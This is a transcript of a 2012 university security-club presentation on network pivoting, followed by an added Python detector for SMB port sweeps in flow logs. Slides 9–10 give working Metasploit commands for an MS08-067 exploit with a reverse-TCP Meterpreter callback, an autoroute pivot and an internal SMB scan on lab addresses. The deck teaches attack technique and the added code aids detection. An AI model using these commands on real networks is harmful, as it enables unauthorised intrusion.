
Pivoting

Pivoting. UTD Computer Security Group, Scott Hand, 10 October 2012. Background. Problem: Most of the fun machines are in a private corporate network. Solution: Own the machine you can talk to and coerce it into owning its friends.


Presentation Transcript


  1. Pivoting UTD Computer Security Group Scott Hand 10 October 2012

  2. Background
     • Problem: Most of the fun machines are in a private corporate network
     • Solution: Own the machine you can talk to and coerce it into owning its friends

  3. Pivoting Illustrated
     • Network Structure:
     [Diagram labels: Firewall, Workstation, Server, Server, Server]

  4. Pivoting Illustrated
     • We can’t access servers!
     [Diagram labels: Firewall, Workstation, Server, Server, Server, "OK!", "DENIED"]

  5. Pivoting Illustrated
     • First, own that workstation
     [Diagram labels: Firewall, Workstation, Server, Server, Server, "Exploitstick"]

  6. Pivoting Illustrated
     • First, own that workstation
     [Diagram labels: Firewall, Workstation, Server, Server, Server, "Exploitstick"]

  7. Pivoting Illustrated
     • Now it forwards traffic for us
     [Diagram labels: Firewall, Workstation, Server, Server, Server, "Exploitstick", "Give me datas", "DATA"]

  8. Pivoting Illustrated
     • Now it forwards traffic for us
     [Diagram labels: Firewall, Workstation, Server, Server, Server, "Exploitstick", "Give me datas", "DATA", "Report"]

  9. Demo Script – Initial Access
     • First, own the accessible workstation:
         use exploit/windows/smb/ms08_067_netapi
         set RHOST 192.168.124.128
         set PAYLOAD windows/meterpreter/reverse_tcp
         set LHOST 192.168.124.129
         exploit
     • Once in, check out what NICs are available with ipconfig

  10. Demo Script – Adding Pivot Entry
     • Now add the route:
         run autoroute -s 192.168.123.0 -n 255.255.255.0
     • Run a quick scan:
         use auxiliary/scanner/portscan/tcp
         set RHOSTS 192.168.123.0/24
         set PORTS 139,445
         set THREADS 50
         run
     • We’re in!
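
The scan on slide 10 seen from the defender's side, as an added example that is not part of the original presentation: a pivot host sweeping 192.168.123.0/24 on ports 139 and 445 shows up in internal flow logs as one source contacting many distinct hosts on SMB ports within a short window. The flow-record tuple format, the 60-second window, the threshold of 20 hosts and the sample addresses (192.168.123.5, .10, .40, .41) are assumptions made for illustration.

```python
from collections import defaultdict, deque
from ipaddress import ip_address, ip_network

SMB_PORTS = {139, 445}     # ports swept in the slide-10 scan
WINDOW_SECONDS = 60        # assumed detection window
FANOUT_THRESHOLD = 20      # assumed: distinct internal targets per window

def find_smb_sweeps(flows, protected_net, window=WINDOW_SECONDS,
                    threshold=FANOUT_THRESHOLD):
    """Return {src_ip: peak count of distinct hosts in `protected_net`
    contacted on SMB ports within any `window`-second span}, for sources
    at or above `threshold`. `flows`: (epoch_s, src_ip, dst_ip, dst_port)."""
    net = ip_network(protected_net)
    recent = defaultdict(deque)                     # src -> (ts, dst) in window
    counts = defaultdict(lambda: defaultdict(int))  # src -> dst -> hits in window
    peak = defaultdict(int)
    for ts, src, dst, dport in sorted(flows):
        if dport not in SMB_PORTS or ip_address(dst) not in net:
            continue
        q, c = recent[src], counts[src]
        q.append((ts, dst))
        c[dst] += 1
        while q and ts - q[0][0] > window:          # expire flows outside window
            _, old = q.popleft()
            c[old] -= 1
            if c[old] == 0:
                del c[old]
        peak[src] = max(peak[src], len(c))
    return {s: n for s, n in peak.items() if n >= threshold}

def sample_flows():
    """Constructed flow records, not captured traffic."""
    flows = []
    # Dual-homed workstation (assumed internal address .5) sweeping the /24
    for i in range(1, 255):
        if i == 5:
            continue
        for port in (139, 445):
            flows.append((1000 + i // 25, "192.168.123.5", f"192.168.123.{i}", port))
    # Ordinary client talking to a single file server every 30 seconds
    for t in range(0, 300, 30):
        flows.append((1000 + t, "192.168.123.40", "192.168.123.10", 445))
    flows.append((1005, "192.168.123.41", "192.168.123.10", 80))  # non-SMB, ignored
    return flows

if __name__ == "__main__":
    for src, n in find_smb_sweeps(sample_flows(), "192.168.123.0/24").items():
        print(f"{src} contacted {n} hosts on 139/445 within {WINDOW_SECONDS}s")
```

Because the route added with autoroute sends the scan through the workstation, the flagged source is the workstation's internal interface, not the attacker's address.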
